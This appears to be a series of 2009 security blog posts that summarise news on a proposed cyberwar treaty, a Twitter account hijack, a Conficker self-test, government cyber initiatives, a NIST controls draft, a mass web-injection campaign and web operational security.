Sunday, June 28, 2009

U.S. and Russia Cyberspace Treaty? Nyet!

In this interesting article from The New York Times today, Russia is looking to negotiate an international treaty for limiting weapons in cyberspace. Such a treaty would be along the lines of similar bilateral agreements limiting chemical and nuclear weapons.

But, according to the article, the U.S. says a cyberwar treaty is unnecessary and sees the issue instead of improving international law enforcement. The U.S. argument is that international police protections against cybercrime, which are weak at best right now, would prevent cyberwar.

The difference in viewpoints is interesting, since the Russians see the lack of a treaty as a dangerous prelude to a virtual arms race in cyberspace, similar to what happened during the Cold War with nuclear weapons. And, the U.S. sees the issue as one of law enforcement. Besides, according to the U.S., the 50,000 attacks a day hitting U.S. targets -- mostly from China and Russia -- need to be criminalized to be legally combatted.

In addition, a treaty would be hard to enforce since there are no jurisdictions online. Attacks emanating from a hostile country could anonymously bounce around servers all over the world, making the true origin hard to pin point.

The issue is also interesting since it comes within a week of U.S. Defense Secretary Robert Gates announcing the formation of a new cybercommand at the Pentagon.

Wednesday, June 24, 2009

Twitter Victim of Possible Phishing Attack

In a high profile recent hack of Twitter, the account of well-known Mac evangelist Guy Kawasaki was breached. Kawasaki's tweets were sending out a link to a porn video, something the tech guru isn't known for.

It's not clear exactly how the account was breached but there are suspicions of a phishing site that tricks users to log into a fake Twitter account that steal their authentication credentials. The porn site linked to Kawasaki downloaded Trojans onto the desktops of unsuspecting users and targets both Windows and Mac systems.

Twitter seems to be in the sights of hackers recently, since a good well-placed hack of a user with a large number of followers -- like Kawasaki's 140,000 -- can spread web nasties very, very quickly.

Other recent attacks have been against the Twitter account of the Mormon Church of Latter Day Saints and Cligs, a URL-shortening service competing with the famous TinyURL.

Monday, June 15, 2009

An Eye Chart to Test for Conficker?

This is a new one. At first, I thought it was a bit bizarre. But when I took a second look, I actually thought it was sort of clever. The Conficker Eye Chart is a test to see if your workstation is infected with Conficker.

It works by checking if your browser can access common anti-viral software, which is often turned off for those plagued by Conficker.

If you climb up the URL of the Eye Chart, you get to the Conficker Work Group blog, run by a group of IT security professionals tracking the activities of this most mysterious of attacks against computer systems and networks.

Sunday, June 14, 2009

Defending Cybersecurity and Protecting Privacy

New initiatives by the Obama administration to protect cyberspace may run up against protecting online privacy, according to this article last week in The New York Times.

The creation of a new cybersecurity command by the Pentagon to do the job may also give the government extra powers to snoop on individual communications over the Internet. The idea is for the Pentagon to beef up its capabilities to fight cybercombat, just as it does with its physical forces on air, sea and land.

Since some of this will also involve taking over cybermonitoring functions of the NSA, which the government initiative hopes will reduce the ongoing turf wars over cyberdefenses, the privacy issue has come to the fore.

Gen. James Cartwright, vice chairman of the Joint Chiefs of Staff, commented in the article that sovereignty in cyberspace, which is truly global, is difficult to define. Maren Leed, a former Pentagon specialist in cyberoperations and now a defense expert at the Center for Strategic and International Studies, was also quoted as saying what would be an acceptable intrusion in time of war had to be defined.

But President Obama in his White House speech on the subject last month said, “will not — I repeat, will not — include monitoring private sector networks or Internet traffic.”

NIST Security Control Document Available for Review

The National Institute of Standards and Technology (NIST) has released the latest draft of its 800-53 publication on security controls. The updated document, Revision 3, part of the well-known 800 series of NIST guidelines for IT security, is available on their web site for public comment until July 1.

The document has input, as well, from both the military and intelligence communities on improving security controls for IT systems.

Here are highlights from the document of some of the updates:
  • A simplified, six-step Risk Management Framework
  • Additional security controls and control enhancements for advanced cyber threats
  • Recommendations for prioritizing or sequencing security controls during implementation or deployment
  • Revised security control structure with a new references section to list applicable federal laws, Executive Orders, directives, policies, standards, and guidelines related to a control
  • Elimination of security requirements from Supplemental Guidance sections
  • Guidance on using the Risk Management Framework for legacy information systems and for external providers of information system services
  • Updates to security control baselines consistent with current threat information and known cyber attacks
  • Removal of the FIPS 199 security control baseline allocation bar resident with each control
  • Organization-level security controls for managing information security programs
  • Guidance on the management of common controls within organizations
  • Strategy for harmonizing FISMA security standards and guidelines with international security standard ISO/IEC 27001

Friday, June 05, 2009

Mass Injection Attack Hits 20,000 Web Sites

Websense Security Labs has detected a mass injection attack affecting 20,000 web sites with malicious JavaScript that hides code redirecting users to a site with active exploits. The attack, uncovered last week, used a domain similar to the legitimate domain for Google Analytics.

In another post this week, Websense Security Labs provided more technical details about what it called the Beladen attack, German for "loaded," because the hacked web site is loaded with exploits.

Basically, the hacked legitimate site contains obfuscated code, does some checks to make sure to verify the referrer to prevent exposure of the code, and then redirects the user's browser to the Beladen web site, chock full of malicious goodies.

Operational Security for the Web

The term operational security usually refers to physical security -- things like keeping your basic movements a secret, protecting your identity and other ways to keep one's "cover." In this brief article by Ira Winkler on the Internet Evolution newsletter, Winkler gives an example of an undercover security guard at a store who practiced poor operational security and, as a result, was easy to spot.

What's interesting in this little piece is that Winkler then explains how many companies practice similar poor operational security on the web, by disclosing too much information -- information that could be used by clever social engineers to gain malicious access.

He talks about how companies often fail to classify their data, so they even know what they need to protect. Winkler, a former NSA employee, who knows a thing or two about operational security, is also the author of a fascinating book, Spies Among Us, about insider threats and corporate espionage.